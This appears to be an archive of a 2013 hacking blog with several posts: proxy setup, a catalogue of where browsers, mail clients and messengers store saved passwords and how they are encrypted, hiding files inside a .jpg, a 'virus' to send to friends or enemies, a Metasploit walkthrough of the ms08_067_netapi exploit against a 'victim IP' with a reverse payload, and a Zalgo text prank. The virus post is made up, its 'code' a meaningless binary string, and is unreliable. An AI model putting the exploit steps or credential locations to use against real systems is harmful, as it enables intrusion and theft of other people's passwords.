Pages

Friday, 6 December 2013

How do I use a Proxy Server?

Please be aware that the use of proxy servers without the express permission from the owner of the proxy server may be illegal in some states and/or countries. Use at your own risk.
Use your favorite search engine and search for 'proxy server list'. You'll find many sites with lists of proxy servers, their IP address, the port they listen on, and usually what country they are in. Write down a few of them.
You may see references to four different types of proxy servers:
Proxy server list 

Transparent Proxy

This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.)

Anonymous Proxy

This type of proxy server indentifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.

Distorting Proxy

This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers.

High Anonymity Proxy

This type of proxy server does not identify itself as a proxy server and does not make available the original IP address.
Please make sure to read about anonymous proxy risks before using a proxy server.
If you need further assistance using proxy servers please post a question in the proxy server forum.

Browser Settings

How to Use?
Mozilla is the famous browser. So i will explain how to use the proxy servers in Mozilla.

Open Mozilla FireFox.
Select Tools from menu bar(or simply press ALT+T)
Click the Options
Small window Will Open.
Navigate to Advanced tab
Click Settings.
Now select the Manual Proxy Configuration Radio Button.

Paste the one of the Ip address of Proxy server and set the Port as defined in the list.
For Eg:
Let's take this proxy
058.056.108.114:80
Here ip address is 058.056.108.114
Port no is :80
That's all click ok.
Now to check the whether your ip address is changed or not, visit "www.whatismyipaddress.com".


All Saved Password Location


Google Chrome:

Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location


XP � C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista � C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default


Trillian:

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently.

Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) � C:\Program Files\Trillian\users\

XP (new version) � C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global � I am not sure on exact but it is somewhere there.

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal



MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[AccountName]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with �WindowsLive:name=�. They a set of Win API functions (Credential API�s) to store its� security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the �target name� and �type�. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.



Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]



Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]



Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.



Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(�EOptions string� value)



Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager � �ETS� value.
The value stored in �ETS� value cannot be recovered back to the original password.



AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



Filezilla:

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this



Internet Explorer 4.00 � 6.00:

The passwords are stored in a secret location in the Registry known as the �Protected Storage�.
The base key of the Protected Storage is located under the following key:
�HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider�.

You can browse the above key in the Registry Editor (RegEdit), but you won�t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.



Internet Explorer 7.00 � 8.00:

The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.



Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile



Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 98/2000:


Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.



ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.



Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

 

Tuesday, 3 December 2013

Hide multiple files into a single .jpg file

Hide multiple files into a single .jpg file

 

 What I am going to tell about hiding multiple files into a single .jpg file, tis process is known as Binding, which most of us get confused with Steganography.

I  am going to explain how to bind files to a single image file.
                                                                                                                                    Steps involved:

  1. Compress the files as a single rar file and name give an appropriate name (hide.rar in my case)
  2. Copy the Image file (Image.jpg) and the rar file to the same folder
  3. In the command prompt, use the following command: Copy /b Image.jpg + hide.rar HiddenImg.jpg
  4. Now if you double click on the HiddenImg.jpg you would see the image as of the Image.jpg
  5. Now open in WinRar and you would find all the files under the Hide.rar
I have two documents file and an Image file.
This technique is also used by hackers to attack a remote computer.

 

Monday, 2 December 2013

Bypass Phone and SMS verification of Any Website

Bypass Phone and SMS verification of Any Website

Virus to Format Hard Disk

Virus to Format Hard Disk !!!

 

 Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own/other computer.

 


 Copy the below codes into Notepad

                        0100101100011111001001010101010101000001111110000      

   Save the file as Format.exe
          You have created your virus..............
Enjoy It.........

 

Metasploit Basic Command Tutorial

Metasploit Basic Command Tutorial

 Hello Friends,
Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5  machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.
                            This is a simple tutorial by me .If you wanna learn more  about metasploit go to Wikipedia.

                                                                                                                                                             Msfconsole

Msfconsole is a console or a command windows of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.
So on your terminal type msfconsole to start metasploit console.
                                                          root@bt:~# msfconsole     

Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type.
                                                          root@bt:~# msfgui               
   
Help command of metasploit will give you the basic idea about the usage of metasploit, if you are looking for msfconsole help than from the root windows type.
                                                        root@bt:~# msfconsole -h   
For msfconsole usage you need to be on msfconsole window to get the help.
                                                                msf > help                   
Connect command is nothing but the alternate of telnet and ncat in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine.
                                                 msf > connect -s www.metasploit.com 443  
                                                [*] Connected to www.metasploit.com:443  
                                                GET / HTTP/1.0                                            
-s ? SSL
Ping command of msfconsole is to check the alive host and so on.
                                                     msf > ping 192.168.1.45         
Show exploits is a command to check all the available exploits on metasploit.
                                                       msf > show exploits                 
Show payloads just like show exploits, show payloads will show you all the available payloads on metasploit.
                                                     msf > show payloads            
Info command will give you more information about any exploits and payloads.
                                                    msf>info <exploit>                
                                                    msf>info <payload>
             
Use command will give metasploit an instruction to use a exploit or payload.
                                            msf > use exploit/windows/smb/ms08_067_netapi    
                                            msf exploit(ms08_067_netapi) >                                

msf exploit(ms08_067_netapi) > show options To show available options
msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 ? To set remote IP (victim IP)
msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 ? To set local IP (attacker IP)
msf exploit(ms08_067_netapi) > set rport 445 ? To set port number of remote host
msf exploit(ms08_067_netapi) > set lport 443 ? To set port number of local host
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns ? Tp set payload

msf exploit(ms08_067_netapi) > unset rhost ? To remove rhost
msf exploit(ms08_067_netapi) > unset lhost ? To remove local host
msf exploit(ms08_067_netapi) > exploit ? To execute exploit
msf exploit(ms08_067_netapi) > back ? To go back on the main window
msf exploit(ms08_067_netapi) > sessions -l ? To check any active session
msf exploit(ms08_067_netapi) > sessions -i ID ? To go on a active session ID must be numeric number

Sunday, 1 December 2013

Prank Your Facebook Friends Using Zalgo Text Generator Tool

Prank Your Facebook Friends Using Zalgo Text Generator Tool

  How will you feel when you see something scary on Facebook statuses? or something that looks like if is a bug on Facebook? Well, here i gonna share something exactly matching that same thing that will prank your Facebook friend by posting something scary/grungy text effect called zalgo text. I will provide you a link of zalgo text generator below that will allow you to generate amazing scary text that you can easily post on Facebook status even you can directly paste into Facebook chat
 


if you wanna see live demo about how exactly this working and looks like then you have a look at thisprophet hacker �s facebook fan page post. So, if you like this amazing effect and want to post it on Facebook to prank your friends then below are full steps for getting this effect.

Step 1


 Step 2

There you will see text generator tool like below :



Step 3

Now, just write something that you like on first box and your new scary zalgo text will be generated in the other box right on it�s side.

Step 4

 Also you have some more option that you can configure in order to make your text effect more outstanding and look more scary, so check those too.

 Step 5

now you have to copy the text and then you can easily paste and post on your facebook timeline as statues update or into your facebook chat.